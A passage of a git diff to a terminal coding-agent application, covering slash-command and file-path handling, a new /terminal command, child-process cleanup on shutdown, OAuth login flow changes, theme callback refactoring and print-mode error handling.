+		["Unknown command: /definitely-not-a-command. Use slash autocomplete to see available commands."],
+	);
+	assert.equal(getEditorText(), "", "unknown slash commands should clear the editor after showing the error");
+});
+
+test("input-controller: absolute file paths are not treated as slash commands (#3478)", async () => {
+	const { host, prompted, errors } = createHost();
+
+	await host.defaultEditor.onSubmit("/Users/name/Desktop/screenshot.png");
+
+	assert.deepEqual(errors, [], "file paths should not trigger unknown command error");
+	assert.deepEqual(prompted, ["/Users/name/Desktop/screenshot.png"], "file paths should be sent as plain input");
+});
+
+test("input-controller: Linux absolute paths are not treated as slash commands (#3478)", async () => {
+	const { host, prompted, errors } = createHost();
+
+	await host.defaultEditor.onSubmit("/home/user/documents/file.txt");
+
+	assert.deepEqual(errors, [], "Linux paths should not trigger unknown command error");
+	assert.deepEqual(prompted, ["/home/user/documents/file.txt"], "Linux paths should be sent as plain input");
+});
+
+test("input-controller: /tmp paths are not treated as slash commands (#3478)", async () => {
+	const { host, prompted, errors } = createHost();
+
+	await host.defaultEditor.onSubmit("/tmp/some-file.log");
+
+	assert.deepEqual(errors, []);
+	assert.deepEqual(prompted, ["/tmp/some-file.log"]);
+});
diff --git a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts
index 0bb073044..a1fefba87 100644
--- a/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/controllers/input-controller.ts
@@ -8,6 +8,7 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & {
 	showError: (message: string) => void;
 	updateEditorBorderColor: () => void;
 	isExtensionCommand: (text: string) => boolean;
+	isKnownSlashCommand: (text: string) => boolean;
 	queueCompactionMessage: (text: string, mode: "steer" | "followUp") => void;
 	updatePendingMessagesDisplay: () => void;
 	flushPendingBashComponents: () => void;
@@ -17,12 +18,18 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & {
 		text = text.trim();
 		if (!text) return;
 
-		if (text.startsWith("/")) {
+		if (text.startsWith("/") && !looksLikeFilePath(text)) {
 			const handled = await dispatchSlashCommand(text, host.getSlashCommandContext());
 			if (handled) {
 				host.editor.setText("");
 				return;
 			}
+			if (!host.isKnownSlashCommand(text)) {
+				const command = text.split(/\s/)[0];
+				host.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`);
+				host.editor.setText("");
+				return;
+			}
 		}
 
 		if (text.startsWith("!")) {
@@ -46,7 +53,12 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & {
 			if (host.isExtensionCommand(text)) {
 				host.editor.addToHistory?.(text);
 				host.editor.setText("");
-				await host.session.prompt(text);
+				try {
+					await host.session.prompt(text);
+				} catch (error: unknown) {
+					const errorMessage = error instanceof Error ? error.message : "Unknown error occurred";
+					host.showError(errorMessage);
+				}
 			} else {
 				host.queueCompactionMessage(text, "steer");
 			}
@@ -82,5 +94,28 @@ export function setupEditorSubmitHandler(host: InteractiveModeStateHost & {
 		}
 
 		host.editor.addToHistory?.(text);
+		// submitPromptsDirectly is false — still dispatch via session.prompt so user input
+		// is not silently discarded.
+		try {
+			await host.session.prompt(text);
+		} catch (error: unknown) {
+			const errorMessage = error instanceof Error ? error.message : "Unknown error occurred";
+			host.showError(errorMessage);
+		}
 	};
 }
+
+/**
+ * Distinguish absolute file paths from slash commands (#3478).
+ * Drag-and-drop inserts paths like "/Users/name/Desktop/file.png" which
+ * should be treated as plain text input, not a /Users command.
+ *
+ * Heuristic: a slash command is a single token like "/help" or "/gsd auto".
+ * File paths have a second "/" within the first token (e.g., "/Users/...").
+ */
+function looksLikeFilePath(text: string): boolean {
+	const firstToken = text.split(/\s/)[0];
+	// Slash commands: /help, /gsd, /commit — single "/" at start only.
+	// File paths: /Users/name/file, /home/user/file, /tmp/x — contain "/" after position 0.
+	return firstToken.indexOf("/", 1) !== -1;
+}
diff --git a/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts b/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts
index cd9550f12..72e98689e 100644
--- a/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts
@@ -7,6 +7,7 @@ import * as crypto from "node:crypto";
 import * as fs from "node:fs";
 import * as os from "node:os";
 import * as path from "node:path";
+import { listDescendants } from "@gsd/native";
 import type { AgentMessage } from "@gsd/pi-agent-core";
 import type { AssistantMessage, ImageContent, Message, Model, OAuthProviderId } from "@gsd/pi-ai";
 import type {
@@ -78,9 +79,10 @@ import { ExtensionSelectorComponent } from "./components/extension-selector.js";
 import { FooterComponent } from "./components/footer.js";
 import { appKey, appKeyHint, editorKey, formatKeyForDisplay, keyHint, rawKeyHint } from "./components/keybinding-hints.js";
 import { LoginDialogComponent } from "./components/login-dialog.js";
-import { ModelSelectorComponent } from "./components/model-selector.js";
+import { ModelSelectorComponent, providerDisplayName } from "./components/model-selector.js";
 import { OAuthSelectorComponent } from "./components/oauth-selector.js";
 import { ProviderManagerComponent } from "./components/provider-manager.js";
+import { getProviderSetupAction } from "./provider-auth-setup.js";
 import { ScopedModelsSelectorComponent } from "./components/scoped-models-selector.js";
 import { SessionSelectorComponent } from "./components/session-selector.js";
 import { SettingsSelectorComponent } from "./components/settings-selector.js";
@@ -107,6 +109,7 @@ import {
 	getThemeByName,
 	initTheme,
 	onThemeChange,
+	stopThemeWatcher,
 	setRegisteredThemes,
 	setTheme,
 	setThemeInstance,
@@ -156,6 +159,10 @@ export interface InteractiveModeOptions {
 }
 
 export class InteractiveMode {
+	// Cap rendered chat components to prevent unbounded memory/CPU growth.
+	// Only render-components are removed — session transcript stays on disk.
+	private static readonly MAX_CHAT_COMPONENTS = 100;
+
 	private session: AgentSession;
 	private ui: TUI;
 	private chatContainer: Container;
@@ -202,6 +209,9 @@ export class InteractiveMode {
 	// Agent subscription unsubscribe function
 	private unsubscribe?: () => void;
 
+	// Branch change listener unsubscribe function
+	private _branchChangeUnsub?: () => void;
+
 	// Track if editor is in bash mode (text starts with !)
 	private isBashMode = false;
 
@@ -329,7 +339,7 @@ export class InteractiveMode {
 				return filtered.map((item) => ({
 					value: item.label,
 					label: item.id,
-					description: item.provider,
+					description: providerDisplayName(item.provider),
 				}));
 			};
 		}
@@ -511,7 +521,7 @@ export class InteractiveMode {
 		});
 
 		// Set up git branch watcher (uses provider instead of footer)
-		this.footerDataProvider.onBranchChange(() => {
+		this._branchChangeUnsub = this.footerDataProvider.onBranchChange(() => {
 			this.ui.requestRender();
 		});
 
@@ -1519,6 +1529,13 @@ export class InteractiveMode {
 		options: string[],
 		opts?: ExtensionUIDialogOptions,
 	): Promise<string | undefined> {
+		// If a previous selector is still active, dispose it before creating a
+		// new one.  This avoids leaking the previous promise and DOM state when
+		// showExtensionSelector is called rapidly.
+		if (this.extensionSelector) {
+			this.hideExtensionSelector();
+		}
+
 		return new Promise((resolve) => {
 			if (opts?.signal?.aborted) {
 				resolve(undefined);
@@ -1982,6 +1999,7 @@ export class InteractiveMode {
 			handleDebugCommand: () => this.handleDebugCommand(),
 			shutdown: () => this.shutdown(),
 			executeCompaction: (instructions, isAuto) => this.executeCompaction(instructions, isAuto),
+			handleBashCommand: (command, options) => this.handleBashCommand(command, options?.excludeFromContext, options?.displayCommand, options?.loginShell),
 		};
 	}
 
@@ -1990,8 +2008,9 @@ export class InteractiveMode {
 	}
 
 	private subscribeToAgent(): void {
-		this.unsubscribe = this.session.subscribe(async (event) => {
-			await this.handleEvent(event);
+		let eventQueue: Promise<void> = Promise.resolve();
+		this.unsubscribe = this.session.subscribe((event) => {
+			eventQueue = eventQueue.then(() => this.handleEvent(event)).catch(() => {});
 		});
 	}
 
@@ -2092,11 +2111,13 @@ export class InteractiveMode {
 							const userComponent = new UserMessageComponent(
 								skillBlock.userMessage,
 								this.getMarkdownThemeWithSettings(),
+								message.timestamp,
+								this.settingsManager.getTimestampFormat(),
 							);
 							this.chatContainer.addChild(userComponent);
 						}
 					} else {
-						const userComponent = new UserMessageComponent(textContent, this.getMarkdownThemeWithSettings());
+						const userComponent = new UserMessageComponent(textContent, this.getMarkdownThemeWithSettings(), message.timestamp, this.settingsManager.getTimestampFormat());
 						this.chatContainer.addChild(userComponent);
 					}
 					if (options?.populateHistory) {
@@ -2110,6 +2131,7 @@ export class InteractiveMode {
 					message,
 					this.hideThinkingBlock,
 					this.getMarkdownThemeWithSettings(),
+					this.settingsManager.getTimestampFormat(),
 				);
 				this.chatContainer.addChild(assistantComponent);
 				break;
@@ -2122,6 +2144,18 @@ export class InteractiveMode {
 				const _exhaustive: never = message;
 			}
 		}
+		this.trimChatHistory();
+	}
+
+	/**
+	 * Remove oldest components when chat exceeds MAX_CHAT_COMPONENTS.
+	 * Only render-components are removed — session data stays in SessionManager.
+	 */
+	private trimChatHistory(): void {
+		while (this.chatContainer.children.length > InteractiveMode.MAX_CHAT_COMPONENTS) {
+			const oldest = this.chatContainer.children[0];
+			this.chatContainer.removeChild(oldest);
+		}
 	}
 
 	/**
@@ -2216,6 +2250,7 @@ export class InteractiveMode {
 		}
 
 		this.pendingTools.clear();
+		this.trimChatHistory();
 		this.ui.requestRender();
 	}
 
@@ -2309,6 +2344,21 @@ export class InteractiveMode {
 		if (shutdownBehavior === "stop_ui") {
 			return;
 		}
+
+		// Kill ALL descendant processes to prevent orphans (next-server, pnpm dev, etc.)
+		try {
+			const descendants = listDescendants(process.pid);
+			for (const childPid of descendants) {
+				try { process.kill(childPid, "SIGTERM"); } catch {}
+			}
+			if (descendants.length > 0) {
+				await new Promise(resolve => setTimeout(resolve, 500));
+				for (const childPid of descendants) {
+					try { process.kill(childPid, "SIGKILL"); } catch {}
+				}
+			}
+		} catch {}
+
 		process.exit(0);
 	}
 
@@ -2331,24 +2381,36 @@ export class InteractiveMode {
 		const ignoreSigint = () => {};
 		process.on("SIGINT", ignoreSigint);
 
-		// Set up handler to restore TUI when resumed
-		process.once("SIGCONT", () => {
+		try {
+			// Set up handler to restore TUI when resumed
+			process.once("SIGCONT", () => {
+				process.removeListener("SIGINT", ignoreSigint);
+				this.ui.start();
+				this.ui.requestRender(true);
+			});
+
+			// Stop the TUI (restore terminal to normal mode)
+			this.ui.stop();
+
+			// Send SIGTSTP to process group (pid=0 means all processes in group)
+			process.kill(0, "SIGTSTP");
+		} catch {
+			// If suspend fails (e.g. SIGTSTP not supported), ensure the
+			// SIGINT listener doesn't leak.
 			process.removeListener("SIGINT", ignoreSigint);
-			this.ui.start();
-			this.ui.requestRender(true);
-		});
-
-		// Stop the TUI (restore terminal to normal mode)
-		this.ui.stop();
-
-		// Send SIGTSTP to process group (pid=0 means all processes in group)
-		process.kill(0, "SIGTSTP");
+		}
 	}
 
 	private async handleFollowUp(): Promise<void> {
 		const text = (this.editor.getExpandedText?.() ?? this.editor.getText()).trim();
 		if (!text) return;
 
+		if (text.startsWith("/") && !this.isKnownSlashCommand(text)) {
+			const command = text.split(/\s/)[0];
+			this.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`);
+			return;
+		}
+
 		// Queue input during compaction (extension commands execute immediately)
 		if (this.session.isCompacting) {
 			if (this.isExtensionCommand(text)) {
@@ -2460,7 +2522,14 @@ export class InteractiveMode {
 		// Determine editor (respect $VISUAL, then $EDITOR)
 		const editorCmd = process.env.VISUAL || process.env.EDITOR;
 		if (!editorCmd) {
-			this.showWarning("No editor configured. Set $VISUAL or $EDITOR environment variable.");
+			let msg = "No editor configured. Set $VISUAL or $EDITOR environment variable.";
+			if (process.env.TERM_PROGRAM === "iTerm.app") {
+				msg +=
+					"\n\nTip: If you meant to open the GSD dashboard (Ctrl+Alt+G), set Left Option Key to" +
+					" \"Esc+\" in iTerm2 → Profiles → Keys. With the default \"Normal\" setting," +
+					" Ctrl+Alt+G sends Ctrl+G instead.";
+			}
+			this.showWarning(msg);
 			return;
 		}
 
@@ -2624,6 +2693,12 @@ export class InteractiveMode {
 	}
 
 	private queueCompactionMessage(text: string, mode: "steer" | "followUp"): void {
+		if (text.startsWith("/") && !this.isKnownSlashCommand(text)) {
+			const command = text.split(/\s/)[0];
+			this.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`);
+			return;
+		}
+
 		this.compactionQueuedMessages.push({ text, mode });
 		this.editor.addToHistory?.(text);
 		this.editor.setText("");
@@ -2642,6 +2717,32 @@ export class InteractiveMode {
 		return !!extensionRunner.getCommand(commandName);
 	}
 
+	private isKnownSlashCommand(text: string): boolean {
+		if (!text.startsWith("/")) return false;
+
+		const spaceIndex = text.indexOf(" ");
+		const commandName = spaceIndex === -1 ? text.slice(1) : text.slice(1, spaceIndex);
+
+		if (BUILTIN_SLASH_COMMANDS.some((command) => command.name === commandName)) {
+			return true;
+		}
+
+		if (this.isExtensionCommand(text)) {
+			return true;
+		}
+
+		if (this.session.promptTemplates.some((template) => template.name === commandName)) {
+			return true;
+		}
+
+		if (commandName.startsWith("skill:") && this.settingsManager.getEnableSkillCommands()) {
+			const skillName = commandName.slice("skill:".length);
+			return this.session.resourceLoader.getSkills().skills.some((skill) => skill.name === skillName);
+		}
+
+		return false;
+	}
+
 	private async flushCompactionQueue(options?: { willRetry?: boolean }): Promise<void> {
 		if (this.compactionQueuedMessages.length === 0) {
 			return;
@@ -2775,6 +2876,7 @@ export class InteractiveMode {
 					respectGitignoreInPicker: this.settingsManager.getRespectGitignoreInPicker(),
 					quietStartup: this.settingsManager.getQuietStartup(),
 					clearOnShrink: this.settingsManager.getClearOnShrink(),
+					timestampFormat: this.settingsManager.getTimestampFormat(),
 				},
 				{
 					onAutoCompactChange: (enabled) => {
@@ -2878,6 +2980,9 @@ export class InteractiveMode {
 						this.settingsManager.setRespectGitignoreInPicker(enabled);
 						this.autocompleteProvider?.setRespectGitignore(enabled);
 					},
+					onTimestampFormatChange: (format) => {
+						this.settingsManager.setTimestampFormat(format);
+					},
 					onCancel: () => {
 						done();
 						this.ui.requestRender();
@@ -3307,6 +3412,23 @@ export class InteractiveMode {
 					done();
 					this.ui.requestRender();
 				},
+				async (provider: string) => {
+					done();
+
+					const action = getProviderSetupAction({
+						provider,
+						authMode: this.session.modelRegistry.getProviderAuthMode(provider),
+						hasAuth: this.session.modelRegistry.authStorage.hasAuth(provider),
+					});
+
+					if (action.kind === "oauth-login") {
+						await this.showLoginDialog(provider);
+						return;
+					}
+
+					this.showStatus(action.message);
+					this.ui.requestRender();
+				},
 			);
 			return { component, focus: component };
 		});
@@ -3401,14 +3523,6 @@ export class InteractiveMode {
 		this.ui.setFocus(dialog);
 		this.ui.requestRender();
 
-		// Promise for manual code input (racing with callback server)
-		let manualCodeResolve: ((code: string) => void) | undefined;
-		let manualCodeReject: ((err: Error) => void) | undefined;
-		const manualCodePromise = new Promise<string>((resolve, reject) => {
-			manualCodeResolve = resolve;
-			manualCodeReject = reject;
-		});
-
 		// Restore editor helper — also disposes the dialog to reject any
 		// dangling promises and prevent the UI from getting stuck.
 		const restoreEditor = () => {
@@ -3424,23 +3538,7 @@ export class InteractiveMode {
 				onAuth: (info: { url: string; instructions?: string }) => {
 					dialog.showAuth(info.url, info.instructions);
 
-					if (usesCallbackServer) {
-						// Show input for manual paste, racing with callback
-						dialog
-							.showManualInput("Paste redirect URL below, or complete login in browser:")
-							.then((value) => {
-								if (value && manualCodeResolve) {
-									manualCodeResolve(value);
-									manualCodeResolve = undefined;
-								}
-							})
-							.catch(() => {
-								if (manualCodeReject) {
-									manualCodeReject(new Error("Login cancelled"));
-									manualCodeReject = undefined;
-								}
-							});
-					} else if (providerId === "github-copilot") {
+					if (!usesCallbackServer && providerId === "github-copilot") {
 						// GitHub Copilot polls after onAuth
 						dialog.showWaiting("Waiting for browser authentication...");
 					}
@@ -3455,7 +3553,12 @@ export class InteractiveMode {
 					dialog.showProgress(message);
 				},
 
-				onManualCodeInput: () => manualCodePromise,
+				// Callback-server providers race browser callback with pasted redirect URL.
+				// Keep manual-input promise ownership inside provider flow to avoid
+				// orphaned rejections when the callback is not consumed.
+				onManualCodeInput: usesCallbackServer
+					? () => dialog.showManualInput("Paste redirect URL below, or complete login in browser:")
+					: undefined,
 
 				signal: dialog.signal,
 			});
@@ -3487,12 +3590,6 @@ export class InteractiveMode {
 			this.showStatus(`Logged in to ${providerName}. Credentials saved to ${getAuthPath()}`);
 		} catch (error: unknown) {
 			restoreEditor();
-			// Also reject the manual code promise if it's still pending
-			if (manualCodeReject) {
-				manualCodeReject(new Error("Login cancelled"));
-				manualCodeReject = undefined;
-				manualCodeResolve = undefined;
-			}
 			const errorMsg = error instanceof Error ? error.message : String(error);
 			if (errorMsg !== "Login cancelled" && !errorMsg.includes("Superseded") && !errorMsg.includes("disposed")) {
 				this.showError(`Failed to login to ${providerName}: ${errorMsg}`);
@@ -3645,8 +3742,9 @@ export class InteractiveMode {
 		}
 	}
 
-	private async handleBashCommand(command: string, excludeFromContext = false): Promise<void> {
+	private async handleBashCommand(command: string, excludeFromContext = false, displayCommand?: string, loginShell?: boolean): Promise<void> {
 		const extensionRunner = this.session.extensionRunner;
+		const label = displayCommand || command;
 
 		// Emit user_bash event to let extensions intercept
 		const eventResult = extensionRunner
@@ -3663,7 +3761,7 @@ export class InteractiveMode {
 			const result = eventResult.result;
 
 			// Create UI component for display
-			this.bashComponent = new BashExecutionComponent(command, this.ui, excludeFromContext);
+			this.bashComponent = new BashExecutionComponent(label, this.ui, excludeFromContext);
 			if (this.session.isStreaming) {
 				this.pendingMessagesContainer.addChild(this.bashComponent);
 				this.pendingBashComponents.push(this.bashComponent);
@@ -3691,7 +3789,7 @@ export class InteractiveMode {
 
 		// Normal execution path (possibly with custom operations)
 		const isDeferred = this.session.isStreaming;
-		this.bashComponent = new BashExecutionComponent(command, this.ui, excludeFromContext);
+		this.bashComponent = new BashExecutionComponent(label, this.ui, excludeFromContext);
 
 		if (isDeferred) {
 			// Show in pending area when agent is streaming
@@ -3712,7 +3810,7 @@ export class InteractiveMode {
 						this.ui.requestRender();
 					}
 				},
-				{ excludeFromContext, operations: eventResult?.operations },
+				{ excludeFromContext, operations: eventResult?.operations, loginShell },
 			);
 
 			if (this.bashComponent) {
@@ -3801,6 +3899,33 @@ export class InteractiveMode {
 			this.loadingAnimation = undefined;
 		}
 		this.clearExtensionTerminalInputListeners();
+
+		// Clean up branch change listener (Fix 1)
+		this._branchChangeUnsub?.();
+		this._branchChangeUnsub = undefined;
+
+		// Clean up theme change listener and watcher (Fix 2)
+		onThemeChange(() => {});
+		stopThemeWatcher();
+
+		// Resolve any pending getUserInput promise so the run() loop can exit (Fix 3)
+		if (this.onInputCallback) {
+			this.onInputCallback("");
+			this.onInputCallback = undefined;
+		}
+
+		// Dispose extension widgets, custom footer, and custom header (Fix 4)
+		this.clearExtensionWidgets();
+		if (this.customFooter?.dispose) {
+			this.customFooter.dispose();
+		}
+		this.customFooter = undefined;
+		if (this.customHeader?.dispose) {
+			this.customHeader.dispose();
+		}
+		this.customHeader = undefined;
+		this.autocompleteProvider = undefined;
+
 		this.footer.dispose();
 		this.footerDataProvider.dispose();
 		if (this.unsubscribe) {
diff --git a/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts b/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts
new file mode 100644
index 000000000..6f22384a5
--- /dev/null
+++ b/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts
@@ -0,0 +1,40 @@
+import type { ProviderAuthMode } from "../../core/model-registry.js";
+
+export type ProviderSetupAction =
+	| { kind: "oauth-login" }
+	| { kind: "status"; message: string };
+
+export function getProviderSetupAction(options: {
+	provider: string;
+	authMode: ProviderAuthMode;
+	hasAuth: boolean;
+}): ProviderSetupAction {
+	const { provider, authMode, hasAuth } = options;
+
+	if (authMode === "oauth") {
+		return { kind: "oauth-login" };
+	}
+
+	if (authMode === "none") {
+		return {
+			kind: "status",
+			message: `${provider} does not need auth setup. Use /model to select it.`,
+		};
+	}
+
+	if (authMode === "externalCli") {
+		return {
+			kind: "status",
+			message: hasAuth
+				? `${provider} is already authenticated. Use /model to select it.`
+				: `${provider} uses external CLI auth. Sign in with the provider CLI, then use /model.`,
+		};
+	}
+
+	return {
+		kind: "status",
+		message: hasAuth
+			? `${provider} already has credentials configured. Use /model to select it.`
+			: `${provider} uses API-key auth, not OAuth. Configure its credentials, then use /model.`,
+	};
+}
diff --git a/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts b/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts
index 46a0e82b0..c510e63b4 100644
--- a/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts
@@ -104,6 +104,9 @@ export interface SlashCommandContext {
 
 	// For compaction
 	executeCompaction(customInstructions?: string, isAuto?: boolean): Promise<unknown>;
+
+	// Bash execution
+	handleBashCommand(command: string, options?: { excludeFromContext?: boolean; displayCommand?: string; loginShell?: boolean }): Promise<void>;
 }
 
 // ---------------------------------------------------------------------------
@@ -133,7 +136,7 @@ export async function dispatchSlashCommand(
 		await ctx.handleModelCommand(searchTerm);
 		return true;
 	}
-	if (text.startsWith("/export")) {
+	if (text === "/export" || text.startsWith("/export ")) {
 		await handleExportCommand(text, ctx);
 		return true;
 	}
@@ -220,6 +223,18 @@ export async function dispatchSlashCommand(
 		await ctx.shutdown();
 		return true;
 	}
+	if (text === "/terminal" || text.startsWith("/terminal ")) {
+		const command = text.startsWith("/terminal ") ? text.slice(10).trim() : "";
+		if (!command) {
+			ctx.showWarning("Usage: /terminal <command>  (e.g. /terminal ping -c3 1.1.1.1)");
+			return true;
+		}
+		// Run in the user's login shell ($SHELL -l -c) so PATH additions
+		// and env vars from shell profiles (.zprofile/.profile) are available.
+		// Note: shell aliases are not loaded (requires -i which has side effects).
+		await ctx.handleBashCommand(command, { loginShell: true });
+		return true;
+	}
 
 	return false;
 }
diff --git a/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts b/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts
index db1a524a0..763b22734 100644
--- a/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts
@@ -663,7 +663,7 @@ function setGlobalTheme(t: Theme): void {
 
 let currentThemeName: string | undefined;
 let themeWatcher: fs.FSWatcher | undefined;
-let onThemeChangeCallback: (() => void) | undefined;
+const onThemeChangeCallbacks = new Set<() => void>();
 const registeredThemes = new Map<string, Theme>();
 
 export function setRegisteredThemes(themes: Theme[]): void {
@@ -698,9 +698,7 @@ export function setTheme(name: string, enableWatcher: boolean = false): { succes
 		if (enableWatcher) {
 			startThemeWatcher();
 		}
-		if (onThemeChangeCallback) {
-			onThemeChangeCallback();
-		}
+		onThemeChangeCallbacks.forEach(cb => cb());
 		return { success: true };
 	} catch (error) {
 		// Theme is invalid - fall back to dark theme
@@ -718,13 +716,12 @@ export function setThemeInstance(themeInstance: Theme): void {
 	setGlobalTheme(themeInstance);
 	currentThemeName = "<in-memory>";
 	stopThemeWatcher(); // Can't watch a direct instance
-	if (onThemeChangeCallback) {
-		onThemeChangeCallback();
-	}
+	onThemeChangeCallbacks.forEach(cb => cb());
 }
 
-export function onThemeChange(callback: () => void): void {
-	onThemeChangeCallback = callback;
+export function onThemeChange(callback: () => void): () => void {
+	onThemeChangeCallbacks.add(callback);
+	return () => { onThemeChangeCallbacks.delete(callback); };
 }
 
 function startThemeWatcher(): void {
@@ -755,10 +752,8 @@ function startThemeWatcher(): void {
 					try {
 						// Reload the theme
 						setGlobalTheme(loadTheme(currentThemeName!));
-						// Notify callback (to invalidate UI)
-						if (onThemeChangeCallback) {
-							onThemeChangeCallback();
-						}
+						// Notify callbacks (to invalidate UI)
+						onThemeChangeCallbacks.forEach(cb => cb());
 					} catch (_error) {
 						// Ignore errors (file might be in invalid state while being edited)
 					}
@@ -773,9 +768,7 @@ function startThemeWatcher(): void {
 							themeWatcher.close();
 							themeWatcher = undefined;
 						}
-						if (onThemeChangeCallback) {
-							onThemeChangeCallback();
-						}
+						onThemeChangeCallbacks.forEach(cb => cb());
 					}
 				}, 100);
 			}
diff --git a/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts b/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts
index c92763543..f1459a0bb 100644
--- a/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts
+++ b/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts
@@ -23,7 +23,7 @@ const dark: ThemeJson = {
 		blue: "#5f87ff",
 		green: "#b5bd68",
 		red: "#cc6666",
-		yellow: "#ffff00",
+		yellow: "#e6b800",
 		gray: "#808080",
 		dimGray: "#666666",
 		darkGray: "#505050",
@@ -113,6 +113,7 @@ const light: ThemeJson = {
 		green: "#588458",
 		red: "#aa5555",
 		yellow: "#9a7326",
+		warning: "#7a5a00",
 		mediumGray: "#6c6c6c",
 		dimGray: "#767676",
 		lightGray: "#b0b0b0",
@@ -130,7 +131,7 @@ const light: ThemeJson = {
 		borderMuted: "lightGray",
 		success: "green",
 		error: "red",
-		warning: "yellow",
+		warning: "warning",
 		muted: "mediumGray",
 		dim: "dimGray",
 		text: "",
diff --git a/packages/pi-coding-agent/src/modes/print-mode.ts b/packages/pi-coding-agent/src/modes/print-mode.ts
index a2557f99b..a44266450 100644
--- a/packages/pi-coding-agent/src/modes/print-mode.ts
+++ b/packages/pi-coding-agent/src/modes/print-mode.ts
@@ -45,52 +45,62 @@ export async function runPrintMode(session: AgentSession, options: PrintModeOpti
 	});
 
 	// Always subscribe to enable session persistence via _handleAgentEvent
-	session.subscribe((event) => {
+	const unsubscribe = session.subscribe((event) => {
 		// In JSON mode, output all events
 		if (mode === "json") {
 			console.log(JSON.stringify(event));
 		}
 	});
 
-	// Send initial message with attachments
-	if (initialMessage) {
-		await session.prompt(initialMessage, { images: initialImages });
-	}
+	let exitCode = 0;
 
-	// Send remaining messages
-	for (const message of messages) {
-		await session.prompt(message);
-	}
+	try {
+		// Send initial message with attachments
+		if (initialMessage) {
+			await session.prompt(initialMessage, { images: initialImages });
+		}
 
-	// In text mode, output final response
-	if (mode === "text") {
-		const state = session.state;
-		const lastMessage = state.messages[state.messages.length - 1];
+		// Send remaining messages
+		for (const message of messages) {
+			await session.prompt(message);
+		}
 
-		if (lastMessage?.role === "assistant") {
-			const assistantMsg = lastMessage as AssistantMessage;
+		// In text mode, output final response
+		if (mode === "text") {
+			const state = session.state;
+			const lastMessage = state.messages[state.messages.length - 1];
 
-			// Check for error/aborted
-			if (assistantMsg.stopReason === "error" || assistantMsg.stopReason === "aborted") {
-				console.error(assistantMsg.errorMessage || `Request ${assistantMsg.stopReason}`);
-				process.exit(1);
-			}
+			if (lastMessage?.role === "assistant") {
+				const assistantMsg = lastMessage as AssistantMessage;
 
-			// Output text content
-			for (const content of assistantMsg.content) {
-				if (content.type === "text") {
-					console.log(content.text);
+				// Check for error/aborted
+				if (assistantMsg.stopReason === "error" || assistantMsg.stopReason === "aborted") {
+					console.error(assistantMsg.errorMessage || `Request ${assistantMsg.stopReason}`);
+					exitCode = 1;
+				} else {
+					// Output text content
+					for (const content of assistantMsg.content) {
+						if (content.type === "text") {
+							console.log(content.text);
+						}
+					}
 				}
 			}
 		}
+
+		// Ensure stdout is fully flushed before returning
+		// This prevents race conditions where the process exits before all output is written
+		await new Promise<void>((resolve, reject) => {
+			process.stdout.write("", (err) => {
+				if (err) reject(err);
+				else resolve();
+			});
+		});
+	} finally {
+		unsubscribe();
 	}
 
-	// Ensure stdout is fully flushed before returning
-	// This prevents race conditions where the process exits before all output is written
-	await new Promise<void>((resolve, reject) => {
-		process.stdout.write("", (err) => {
-			if (err) reject(err);
-			else resolve();
-		});
-	});
+	if (exitCode !== 0) {
+		process.exit(exitCode);
+	}
 }
diff --git a/packages/pi-coding-agent/src/modes/rpc/jsonl.ts b/packages/pi-coding-agent/src/modes/rpc/jsonl.ts
index 8962c7340..5392defef 100644
--- a/packages/pi-coding-agent/src/modes/rpc/jsonl.ts
+++ b/packages/pi-coding-agent/src/modes/rpc/jsonl.ts
@@ -48,11 +48,17 @@ export function attachJsonlLineReader(stream: Readable, onLine: (line: string) =
 		}
 	};
 
+	const onError = (_err: Error) => {
+		// Stream errors are non-fatal for JSONL reading
+	};
+
 	stream.on("data", onData);
 	stream.on("end", onEnd);
+	stream.on("error", onError);
 
 	return () => {
 		stream.off("data", onData);
 		stream.off("end", onEnd);
+		stream.off("error", onError);
 	};
 }
diff --git a/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts b/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts
index 84f78f950..4dda9b0c9 100644
--- a/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts
+++ b/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts
@@ -49,6 +49,12 @@ export class RemoteTerminal implements Terminal {
 		return this._rows;
 	}
 
+	get isTTY(): boolean {
+		// RemoteTerminal renders to a browser-based terminal emulator via
+		// the RPC bridge — it behaves like a real TTY for rendering purposes.
+		return true;
+	}
+
 	get kittyProtocolActive(): boolean {
 		return false;
 	}
diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts
index a3f91ecc4..e776bd8ad 100644
--- a/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts
+++ b/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts
@@ -11,7 +11,7 @@ import type { SessionStats } from "../../core/agent-session.js";
 import type { BashResult } from "../../core/bash-executor.js";
 import type { CompactionResult } from "../../core/compaction/index.js";
